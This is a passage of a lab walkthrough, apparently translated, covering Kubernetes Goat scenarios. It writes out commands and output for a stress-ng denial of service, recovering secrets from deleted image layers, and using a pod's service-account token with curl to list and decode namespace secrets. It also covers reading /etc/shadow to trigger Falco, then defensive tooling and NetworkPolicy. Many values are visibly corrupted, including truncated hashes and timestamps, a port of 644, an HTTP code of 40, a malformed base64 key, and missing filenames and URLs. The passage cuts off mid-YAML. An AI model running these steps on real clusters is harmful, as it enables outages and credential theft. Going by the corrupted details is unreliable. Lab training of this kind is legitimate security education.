4:memory:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
3:net_cls,net_prio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
2:cpu,cpuacct:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
1:name=systemd:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
0::/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942dfdc8.slice/docker-5702cc4cdd60529077900ade9f40bd11b05e81489487dd94b8084aebd0aac0.scope
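The container ID in those lines can be extracted with a short regex (in a standard setup it is a 64-hex-digit string; the sample line below is shortened from the real output):

```python
import re

def container_id(cgroup_line: str):
    """Return the Docker container ID from a cgroup line, or None."""
    m = re.search(r"docker-([0-9a-f]{64})\.scope", cgroup_line)
    return m.group(1) if m else None

# Shortened stand-in for a line from /proc/self/cgroup:
sample = "12:blkio:/kubepods.slice/kubepods-pod081f809d.slice/docker-" + "ab" * 32 + ".scope"
print(container_id(sample))
```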

The matching container shows up when running docker ps on the node:
$ docker ps -a | grep 5702
5702cc4cdd60   madhuakula/k8s-goat-system-monitor                    "gotty -w bash"          6 days ago     Up 6 days                           k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942dfdc8_0

Other useful information gathering:
cat /proc/self/cgroup
cat /etc/hosts
# mount information
mount
# inspect the filesystem
ls -la /home/
printenv   # or just env

The flag sits right in the environment variables.

DoS the memory and CPU resources

If the Kubernetes deployment YAML places no limits on resource usage, an attacker may be able to exhaust the pod/deployment's resources and DoS the cluster.

Here we use the stress-ng stress-testing tool.

First check the baseline usage: CPU at 0%, memory under 10 MB:
$ docker stats --no-stream | grep hunger
842ef0c146a   k8s_hunger-check_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-420-9265-1447b817e0d_0              0.00%     6.609MiB / 15.64GiB   0.04%     0B / 0B   0B / 0B          8
02af980754   k8s_POD_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-420-9265-1447b817e0d_0                       0.00%     1.227MiB / 15.64GiB   0.01%     0B / 0B   0B / 0B          1

Run the stress test with the command below. --vm 8 starts 8 workers doing anonymous mmap, and --vm-bytes is the memory each worker allocates. With 2G per worker the 16 GB of RAM was never exhausted (only 2-3 GB were used), so I simply raised it to 16G; --timeout stops the test after 60s.
stress-ng --vm 8 --vm-bytes 16G --timeout 60s

Below is an htop screenshot taken on the node during the stress test.

Running docker stats | grep hunger on the node, eventually no stats can be retrieved at all.

Other pods may then be starved of resources, unable to serve user requests or painfully slow. On your own servers this burns extra electricity; in the cloud it can produce a much larger bill.

Looking at the deployment YAML, the resource limits are commented out, though a 1000G limit would hardly count as a limit anyway.
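For comparison, an uncommented resources block would look like the following (values illustrative, not from the scenario); with limits in place the stress-ng workers would be OOM-killed or CPU-throttled instead of starving the node:

```yaml
        resources:
          requests:
            memory: "64Mi"
            cpu: "50m"
          limits:
            memory: "128Mi"
            cpu: "100m"
```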

Hacker container
kubectl run -it --rm hacker-container --image=madhuakula/hacker-container -- sh

Once the pod is up, amicontained assesses the container's privileges:
~ # amicontained
Container Runtime: docker
Has Namespaces:
	pid: true
	user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
	BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (22):
	MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD PERF_EVENT_OPEN FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE KEXEC_FILE_LOAD
Looking for Docker.sock

The image also ships nikto for web vulnerability scanning, though the results are underwhelming:
~ # nikto.pl -host http://metadata-db
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.105.74.206
+ Target Hostname:    metadata-db
+ Target Port:        80
+ Start Time:         2022-06-22 08:20:04 (GMT0)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 77 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2022-06-22 08:21:53 (GMT0) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Hidden in layers

It is all too easy to bake passwords, private keys, tokens and the like into a Docker image.

The author set up a hidden-in-layers job for this:
$ kubectl get jobs
NAME               COMPLETIONS   DURATION   AGE
batch-check-job    1/1           6s        6d5h
hidden-in-layers   0/1           6d5h       6d5h
kube-bench-node    1/1           29s        46h

Check the deployment file to confirm the image name:
$ cat ~/kubernetes-goat/scenarios/hidden-in-layers/deployment.yaml | grep image
        image: madhuakula/k8s-goat-hidden-in-layers

On the node, inspect the image: docker inspect shows the CMD that is ultimately executed, but only that single command.

代码语言:javascript代码运行次数:0运行复制
$ docker inspect madhuakula/k8s-goat-hidden-in-layers | grep "Cmd" -A 5
            "Cmd": null,
            "Image": "",
            "Volumes": null,
            "WorkingDir": "",
            "Entrypoint": null,
            "OnBuild": null,
--
            "Cmd": [
                "sh",
                "-c",
                "tail -f /dev/null"
            ],
            "ArgsEscaped": true,

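Rather than grepping, the inspect output can also be parsed as JSON. A minimal sketch (the embedded document is a trimmed stand-in for real `docker inspect` output, not captured from this image):

```python
import json

# Trimmed stand-in for `docker inspect <image>` output: a JSON list with
# one entry, whose Config.Cmd records the command the container will run.
inspect_output = json.loads("""
[
  {
    "ContainerConfig": {"Cmd": null},
    "Config": {"Cmd": ["sh", "-c", "tail -f /dev/null"]}
  }
]
""")

def final_cmd(inspect_data):
    """Return the CMD recorded in the image's Config section."""
    return inspect_data[0]["Config"]["Cmd"]

print(final_cmd(inspect_output))  # ['sh', '-c', 'tail -f /dev/null']
```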
We have already used docker history to see the command behind each layer. Here a file under /root/ is created, then deleted in a later layer:

代码语言:javascript代码运行次数:0运行复制
$ docker history --no-trunc madhuakula/k8s-goat-hidden-in-layers
IMAGE                                                                     CREATED        CREATED BY                                                                                                              SIZE      COMMENT
sha256:8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc7556177bd68607   5 weeks ago    CMD ["sh" "-c" "tail -f /dev/null"]                                                                                     0B        buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/     && rm -rf /root/ # buildkit   28B       buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    ADD  /root/ # buildkit                                                                              41B       buildkit.dockerfile.v0
<missing>                                                                 5 weeks ago    LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat                                                                       0B        buildkit.dockerfile.v0
<missing>                                                                 2 months ago   /bin/sh -c #(nop)  CMD ["/bin/sh"]                                                                                      0B        
<missing>                                                                 2 months ago   /bin/sh -c #(nop) ADD file:5d67d25daa14ce1f6cf66e4c7fd4f4b85a759a9d9efbfd9ff852b5b56e4 in /                        5.57MB

Another, more comprehensive tool is dfimage (alpine/dfimage). It is built on top of docker inspect and docker history: it can search for secret files (by saving the image to a file, extracting it and searching its contents) and print environment variables (taken from docker inspect); the implementation details are in its .go source files.

代码语言:javascript代码运行次数:0运行复制
$ alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
$ dfimage  madhuakula/k8s-goat-hidden-in-layers:latest
Analyzing madhuakula/k8s-goat-hidden-in-layers:latest
Docker Version: 
GraphDriver: overlay2
Environment Variables
|PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Image user
|User is root

Potential secrets:
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-4a6a0840.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-524ef4b.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-5261cecb.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-6165ee59.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/apk/keys/alpine-devel@lists.alpinelinux-61666ef.rsa.pub Possible public key \.pub$ 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
|Found match etc/ DHCP server configs dhcpd[^ ]*.conf 79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
Dockerfile:
CMD ["/bin/sh"]
LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
ADD  /root/ # buildkit
	root/
	root/

RUN RUN echo "Contributed by Rewanth Cool" >> /root/  \
	&& rm -rf /root/ # buildkit
CMD ["sh" "-c" "tail -f /dev/null"]

The few lines following ADD /root/ look a little odd, but that doesn't matter much.

While searching for dfimage you will also find another GitHub project with the same name that reconstructs a Dockerfile from an image. It is based on docker history, so we don't have to do the reconstruction by hand.

代码语言:javascript代码运行次数:0运行复制
.py#L17

In its output the FROM line is certainly wrong, and the second line doesn't reveal much either:

代码语言:javascript代码运行次数:0运行复制
$ docker run -v /var/run/docker.sock:/var/run/docker.sock dfimage madhuakula/k8s-goat-hidden-in-layers:latest
FROM madhuakula/k8s-goat-hidden-in-layers:latest
ADD file:90e56af1188c7f028d244a0d70b85d8bef8587a41f1da8eaca2aba8964ef in /
CMD ["/bin/sh"]
RUN LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat
RUN ADD  /root/ # buildkit
RUN RUN /bin/sh -c echo "Contributed by Rewanth Cool" >> /root/     \
    && rm -rf /root/ # buildkit
RUN CMD ["sh" "-c" "tail -f /dev/null"]

But this only tells us that the file existed; we want to read it. Simply starting a container won't work, because the file has already been deleted:

代码语言:javascript代码运行次数:0运行复制
$ kubectl run test --rm --restart=Never -it --image=madhuakula/k8s-goat-hidden-in-layers -- sh
If you don't see a command prompt, try pressing enter.
/ # ls
bin    dev    etc    home   lib    media  mnt    opt    proc   root   run    sbin   srv    sys    tmp    usr    var
/ # cd root/
~ # ls -la
total 16
drwx------    1 root     root          4096 Jun 24 08: .
drwxr-xr-x    1 root     root          4096 Jun 24 08:29 ..
-rw-------    1 root     root            19 Jun 24 08:4 .ash_history
-rw-r--r--    1 root     root            28 May 16 20:41 
~ #

The layer just before the deletion still contains it, though. First, save the whole image to a file:

代码语言:javascript代码运行次数:0运行复制
# root @ nsfocus  in ~ [16:5:15]
$ mkdir hidden-in-layers
# root @ nsfocus  in ~ [16:5:24]
$ docker save madhuakula/k8s-goat-hidden-in-layers -o hidden-in-layers/
# root @ nsfocus  in ~ [16:5:48]
$ cd hidden-in-layers/
# root @ nsfocus  in ~/hidden-in-layers [16:5:52]
$ tar -xvf 
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/VERSION
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/json
66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/VERSION
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/json
79cfb8a6b51ac05a78de2a47855d9be9bb700a6df1a1094cdab616745f78/
8944f45111dbbaa72ab62c924b0ae86f05a2e6d5dcf8ae2cc7556177bd68607.json
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/VERSION
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/json
c8e854bdc614a60d68b7cb682ed66c824e25b5c7a7cf14c6db658b9972/
manifest.json
repositories

Some of these layers contain files; with only a few layers we could of course extract them one by one and search by hand.
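That manual approach can also be scripted: walk every layer tar inside the `docker save` archive and look for the path we care about. A self-contained sketch (it first builds a tiny fake image archive in memory, since the layer IDs and flag content here are made up for illustration):

```python
import io
import tarfile

def add_bytes(tar, name, data):
    """Helper: add an in-memory file to a tar archive."""
    info = tarfile.TarInfo(name=name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))

# Minimal stand-in for a `docker save` archive: two layers, one of
# which contains root/flag.txt (layer IDs "aaa"/"bbb" are fake).
image = io.BytesIO()
with tarfile.open(fileobj=image, mode="w") as tar:
    for layer_id, files in {
        "aaa": {"root/flag.txt": b"k8s-goat-demo-flag"},
        "bbb": {"etc/hostname": b"demo"},
    }.items():
        layer = io.BytesIO()
        with tarfile.open(fileobj=layer, mode="w") as lt:
            for name, data in files.items():
                add_bytes(lt, name, data)
        add_bytes(tar, f"{layer_id}/layer.tar", layer.getvalue())
image.seek(0)

def find_in_layers(archive, wanted):
    """Return {layer id: file bytes} for every layer containing `wanted`."""
    hits = {}
    with tarfile.open(fileobj=archive) as tar:
        for member in tar.getmembers():
            if not member.name.endswith("/layer.tar"):
                continue
            layer_id = member.name.split("/")[0]
            with tarfile.open(fileobj=tar.extractfile(member)) as lt:
                for entry in lt.getmembers():
                    if entry.name == wanted:
                        hits[layer_id] = lt.extractfile(entry).read()
    return hits

print(find_in_layers(image, "root/flag.txt"))  # {'aaa': b'k8s-goat-demo-flag'}
```

Pointing `find_in_layers` at a real `docker save` tar would report which layer directory still holds the deleted file.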

But there is a tool that can quickly tell us which layer ID to look at: dive.

代码语言:javascript代码运行次数:0运行复制
wget .10.0/dive_0.10.0_linux_amd64.deb
apt install ./dive_0.10.0_linux_amd64.deb

Run it:

代码语言:javascript代码运行次数:0运行复制
dive madhuakula/k8s-goat-hidden-in-layers

From the figure below we can tell the file lives in layer 66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55.

Finally, extract the file:

代码语言:javascript代码运行次数:0运行复制
# root @ nsfocus  in ~/hidden-in-layers [16:9:52]
$ cd 66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:9:54]
$ ls
json    VERSION
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:9:55]
$ tar -xf ./ 
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:40:05]
$ ls
json    root  VERSION
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55 [16:40:07]
$ cd root/
# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/root [16:40:10]
$ ls

# root @ nsfocus  in ~/hidden-in-layers/66ca4cc4d8d51d6865d9107fc4462e80cf7cf01ac4f8989ac794dfe95df55/root [16:40:12]
$ cat  
k8s-goat-b7a7dc7f51f4014ddf446c25f8b772

RBAC least-privilege misconfiguration

In the early days of Kubernetes there was no RBAC (role-based access control); ABAC (attribute-based access control) was used instead. RBAC now makes it possible to enforce the security principle of least privilege. Even so, permissions are often granted too broadly.

The goal of this challenge is to find the k8svaultapikey.

By default, Kubernetes stores all tokens and service-account information under /var/run/secrets/kubernetes.io/serviceaccount/:

代码语言:javascript代码运行次数:0运行复制
root@hunger-check-deployment-56d65977f6-k68g9:/# cd /var/run/secrets/kubernetes.io/serviceaccount/
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# ls -la
total 4
drwxrwxrwt  root root  140 Jun 24 08:50 .
drwxr-xr-x  root root 4096 Jun 16 02:55 ..
drwxr-xr-x 2 root root  100 Jun 24 08:50 ..2022_06_24_08_50_4.045810252
lrwxrwxrwx 1 root root   1 Jun 24 08:50 ..data -> ..2022_06_24_08_50_4.045810252
lrwxrwxrwx 1 root root   1 Jun 16 02:5  -> ..data/
lrwxrwxrwx 1 root root   16 Jun 16 02:5 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Jun 16 02:5 token -> ..data/token

Some of these paths and addresses are also available as environment variables:

代码语言:javascript代码运行次数:0运行复制
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep SERVICEACCOUNT
SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
root@hunger-check-deployment-56d65977f6-k68g9:/var/run/secrets/kubernetes.io/serviceaccount# env | grep KUBERNETES_SERVICE_HOST
KUBERNETES_SERVICE_HOST=10.96.0.1
代码语言:javascript代码运行次数:0运行复制
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# namespace of the pod
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt

Now we can talk to the API server, and also see its real IP:

代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api
{
  "kind": "APIVersions",
  "versions": [
    "v1"
  ],
  "serverAddressByClientCIDRs": [
    {
      "clientCIDR": "0.0.0.0/0",
      "serverAddress": "192.168.2.174:644"
    }
  ]
}

Querying secrets cluster-wide shows we don't have permission:

代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
    
  },
  "status": "Failure",
  "message": "secrets is forbidden: User \"system:serviceaccount:big-monolith:big-monolith-sa\" cannot list resource \"secrets\" in API group \"\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
    "kind": "secrets"
  },
  "code": 40
}

List the secrets in the current namespace:

代码语言:javascript代码运行次数:0运行复制
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets

List the pods in the current namespace:

代码语言:javascript代码运行次数:0运行复制
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/pods
代码语言:javascript代码运行次数:0运行复制
$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9984    0  9984    0     0   154k      0 --:--:-- --:--:-- --:--:--  154k
          "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"k8svaultapikey\":\"azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U=\"},\"kind\":\"Secret\",\"metadata\":{\"annotati\":{},\"name\":\"vaultapikey\",\"namespace\":\"big-monolith\"},\"type\":\"Opaque\"}\n"
            "fieldsV1": {"f:data":{".":{},"f:k8svaultapikey":{}},"f:metadata":{"f:annotati":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:type":{}}
        "k8svaultapikey": "azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U="

It looks like base64:

代码语言:javascript代码运行次数:0运行复制
$ echo "azhzLWdvYXQtODUwTc4DZhODA0mEyWIzWYzOGYzYTI2DlkY2U=" | base64 -d
k8s-goat-85057846a8046a25b5f8fa2649dce

Looking back at the deployment's YAML, the role simply grants get, watch and list on all resources.
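By contrast, a least-privilege Role would enumerate only the resources and verbs the workload actually needs. A minimal sketch (the role name is illustrative, not from the scenario's manifests; it deliberately grants no access to secrets):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: hunger-check-minimal   # illustrative name
  namespace: big-monolith
rules:
  - apiGroups: [""]
    resources: ["pods"]        # only what the app actually needs
    verbs: ["get", "list"]     # no wildcard resources, no secrets
```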

KubeAudit - auditing Kubernetes clusters

kubeaudit is an open-source tool. It requires cluster administrator privileges; the tiller service account has them, so the idea is to launch the hacker container with the tiller serviceaccount. My cluster, however, doesn't have that account:

代码语言:javascript代码运行次数:0运行复制
$ kubectl run -n kube-system --serviceaccount=tiller --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
Flag --serviceaccount has been deprecated, has no effect and will be removed in the future.
Error from server (Forbidden): pods "bash" is forbidden: error looking up service account kube-system/tiller: serviceaccount "tiller" not found

I find Local Mode the most convenient: just download the binary onto the master and run it.

代码语言:javascript代码运行次数:0运行复制
$ ./kubeaudit all
W0627 14:19:28.6285   957 warnings.go:70] v1 ComponentStatus is deprecated in v1.19+
W0627 14:19:2.81222   957 warnings.go:70] extensions/v1beta1 Ingress is deprecated in v1.14+, unavailable in v1.22+; use networking.k8s.io/v1 Ingress
W0627 14:19:.25577   957 warnings.go:70] policy/v1beta1 PodSecurityPolicy is deprecated in v1.21+, unavailable in v1.25+

---------------- Results for ---------------

  apiVersion: v1
  kind: Namespace
  metadata:
    name: big-monolith

--------------------------------------------

-- [error] MissingDefaultDenyIngressAndEgressNetworkPolicy
   Message: Namespace is missing a default deny ingress and egress NetworkPolicy.
   Metadata:
      Namespace: big-monolith
	  
......
......
......
---------------- Results for ---------------

  apiVersion: apps/v1
  kind: Deployment
  metadata:
    name: hunger-check-deployment
    namespace: big-monolith

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hunger-check' should be added.
   Metadata:
      Container: hunger-check
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hunger-check

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hunger-check

-- [warning] ImageTagMissing
   Message: Image tag is missing.
   Metadata:
      Container: hunger-check

-- [warning] LimitsNotSet
   Message: Resource limits not set.
   Metadata:
      Container: hunger-check

-- [error] RunAsNonRootPSCNilCSCNil
   Message: runAsNonRoot should be set to true or runAsUser should be set to a value > 0 either in the container SecurityContext or PodSecurityContext.
   Metadata:
      Container: hunger-check

-- [error] AllowPrivilegeEscalationNil
   Message: allowPrivilegeEscalation not set which allows privilege escalation. It should be set to 'false'.
   Metadata:
      Container: hunger-check

-- [warning] PrivilegedNil
   Message: privileged is not set in container SecurityContext. Privileged defaults to 'false' but it should be explicitly set to 'false'.
   Metadata:
      Container: hunger-check

-- [error] ReadOnlyRootFilesystemNil
   Message: readOnlyRootFilesystem is not set in container SecurityContext. It should be set to 'true'.
   Metadata:
      Container: hunger-check

-- [error] SeccompAnnotationMissing
   Message: Seccomp annotation is missing. The annotation seccomp.security.alpha.kubernetes.io/pod: runtime/default should be added.
   Metadata:
      MissingAnnotation: seccomp.security.alpha.kubernetes.io/pod
......
......
......
---------------- Results for ---------------

  apiVersion: batch/v1
  kind: Job
  metadata:
    name: hidden-in-layers
    namespace: default

--------------------------------------------

-- [error] AppArmorAnnotationMissing
   Message: AppArmor annotation missing. The annotation 'container.apparmor.security.beta.kubernetes.io/hidden-in-layers' should be added.
   Metadata:
      Container: hidden-in-layers
      MissingAnnotation: container.apparmor.security.beta.kubernetes.io/hidden-in-layers

-- [error] AutomountServiceAccountTokenTrueAndDefaultSA
   Message: Default service account with token mounted. automountServiceAccountToken should be set to 'false' on either the ServiceAccount or on the PodSpec or a non-default service account should be used.

-- [error] CapabilityOrSecurityContextMissing
   Message: Security Context not set. The Security Context should be specified and all Capabilities should be dropped by setting the Drop list to ALL.
   Metadata:
      Container: hidden-in-layers

From the results we can see that the tool audits Namespace, Deployment, DaemonSet and Job resources.

Falco - runtime security monitoring and detection

This requires Helm v3 to be installed first.

Deploy the helm chart into the Kubernetes cluster to install Falco:

代码语言:javascript代码运行次数:0运行复制
helm repo add falcosecurity 
helm repo update
helm install falco falcosecurity/falco
代码语言:javascript代码运行次数:0运行复制
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:9:48]
$ helm repo add falcosecurity 
"falcosecurity" has been added to your repositories
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:40:12]
$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
Update Complete. ⎈Happy Helming!⎈
# root @ k8s-master  in ~/kubernetes-goat/kubeaudit [14:42:00]
$ helm install falco falcosecurity/falco
NAME: falco
LAST DEPLOYED: Mon Jun 27 14:50:10 2022
NAMESPACE: default
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


Tip: 
You can easily forward Falco events to Slack, Kafka, AWS Lambda and more with falcosidekick. 
Full list of outputs: .
You can enable its deployment with `--set =true` or in your values.yaml. 
See: .yaml for configuration values.

Falco can detect and alert on any behaviour that involves Linux system calls. Alerts can be triggered by specific system calls, their arguments, and properties of the calling process. For example, Falco can easily detect events including, but not limited to:

  • A shell running inside a container or pod in Kubernetes.
  • A container running in privileged mode, or mounting a sensitive path such as /proc.
  • An unexpected child process being spawned.
  • An unexpected read of a sensitive file, such as /etc/shadow.
  • A non-device file being written to /dev.
  • A standard system binary (such as ls) making an outbound network connection.
  • A privileged pod being started in the Kubernetes cluster.
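For a feel of how such detections are expressed, here is a hedged sketch of a custom Falco rule for the /etc/shadow case, written in Falco's rule syntax (not a verbatim rule from the shipped ruleset; `open_read` is a macro from Falco's default rules):

```yaml
- rule: Read shadow file (custom)
  desc: Detect any process in a container reading /etc/shadow
  condition: open_read and fd.name = /etc/shadow and container.id != host
  output: >
    /etc/shadow opened for reading
    (user=%user.name command=%proc.cmdline container=%container.id)
  priority: WARNING
```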

Check the status of the Falco pods:

代码语言:javascript代码运行次数:0运行复制
kubectl get pods --selector app=falco

Fetch the logs from Falco:

代码语言:javascript代码运行次数:0运行复制
kubectl logs -f -l app=falco

Let's start a madhuakula/hacker-container and read the sensitive file /etc/shadow to see whether Falco detects it:

代码语言:javascript代码运行次数:0运行复制
kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
cat /etc/shadow
vi /etc/shadow

Because of output buffering, manually fetched logs may lag; run the log command a few times if you want to see the result sooner.

Popeye - a Kubernetes cluster sanitizer

Popeye is a utility that scans a live Kubernetes cluster and reports potential issues with the deployed resources and configurations.

The issues it can detect are listed in its documentation.

Download it:

代码语言:javascript代码运行次数:0运行复制
wget .10.0/popeye_Linux_x86_gz
tar -xvf popeye_Linux_x86_gz

Then just run the binary directly.

At the end it even gives your cluster a grade.

Securing network boundaries using NSP (Network Security Policies)

Set up the lab environment by starting an nginx pod:

代码语言:javascript代码运行次数:0运行复制
kubectl run --image=nginx website --labels app=website --expose --port 80

Start another pod and try to reach the nginx; it is reachable:

代码语言:javascript代码运行次数:0运行复制
$ kubectl run --rm -it --image=alpine temp -- sh
If you don't see a command prompt, try pressing enter.
/ # wget -qO- http://website
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="/">nginx</a>.<br/>
Commercial support is available at
<a href="/">nginx</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
/ #

Create a NetworkPolicy file, website-deny.yaml:

代码语言:javascript代码运行次数:0运行复制
$ cat website-deny.yaml 
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: website-deny
spec:
  podSelector:
    matchLabels:
      app: website
  ingress: []
Apply the policy:

代码语言:javascript代码运行次数:0运行复制
$ kubectl apply -f website-deny.yaml
networkpolicy.networking.k8s.io/website-deny created

Start another temporary pod and try to access the site again; this time the request should be blocked.
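With the default-deny in place, access is usually restored selectively. A sketch of a policy that lets only pods carrying a given label reach the website (the app=trusted label is illustrative, not part of the scenario):

```yaml
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
  name: website-allow-trusted   # illustrative name
spec:
  podSelector:
    matchLabels:
      app: website
  ingress:
    - from:
        - podSelector:
            matchLabels:
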